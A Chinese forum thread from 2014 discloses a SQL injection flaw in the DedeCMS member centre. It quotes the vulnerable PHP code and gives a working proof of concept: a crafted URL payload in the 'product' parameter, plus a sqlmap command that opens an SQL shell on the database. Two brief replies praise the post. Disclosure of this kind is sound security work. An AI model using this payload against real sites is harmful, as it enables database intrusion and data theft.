土豆 发表于 2014-2-27 19:27:46

Dedecms 会员中心注入漏洞

漏洞作者: Matt

在member/buy_action.php文件处,

require_once(dirname(__FILE__)."/config.php");
CheckRank(0,0);
$menutype = 'mydede';
$menutype_son = 'op';
require_once DEDEINC.'/dedetemplate.class.php';

$product = isset($product) ? trim($product) : '';
$mid = $cfg_ml->M_ID;
$ptype = '';
$pname = '';
$price = '';
$mtime = time();

if(isset($pd_encode) && isset($pd_verify) && md5

("payment".$pd_encode.$cfg_cookie_encode) == $pd_verify)
{

    parse_str(mchStrCode($pd_encode,'DECODE'),$mch_Post);
    foreach($mch_Post as $k => $v) $$k = $v;
    $row= $dsql->GetOne("SELECT * FROM #@__member_operation WHERE

mid='$mid' And sta=0 AND product='$product'");
    if(!isset($row['buyid']))
    {
      ShowMsg("请不要重复提交表单!", 'javascript:;');
      exit();
    }
    if(!isset($paytype))
    {
      ShowMsg("请选择支付方式!", 'javascript:;');
      exit();
    }
    $buyid = $row['buyid'];

}else{

    $buyid = 'M'.$mid.'T'.$mtime.'RN'.mt_rand(100,999);
    //删除用户旧的未付款的同类记录
    if(!empty($product))   
    {
      $dsql->ExecuteNoneQuery("Delete From #@__member_operation WHERE

mid='$mid' And sta=0 And product='$product'");//注入点
    }

漏洞证明:

利用方式 注册用户之后登陆

打开http://127.0.0.1/dede/member/buy_action.php?product=1' and @`'` and

1=1* and '1'='1

先利用burp抓一下访问包

然后将抓到的内容保存

然后利用sqlmap进行注入 执行如下命令

sqlmap.py -r c:\1.txt --sql-shell --threads=10 --dbms mysql

其中的1.txt就是我们保存的包文件





Dotlcx 发表于 2014-2-27 19:47:55

这个很赞的。

efupay 发表于 2014-2-28 00:48:52

赞一个啦 辛苦了 这么晚
页: [1]
查看完整版本: Dedecms 会员中心注入漏洞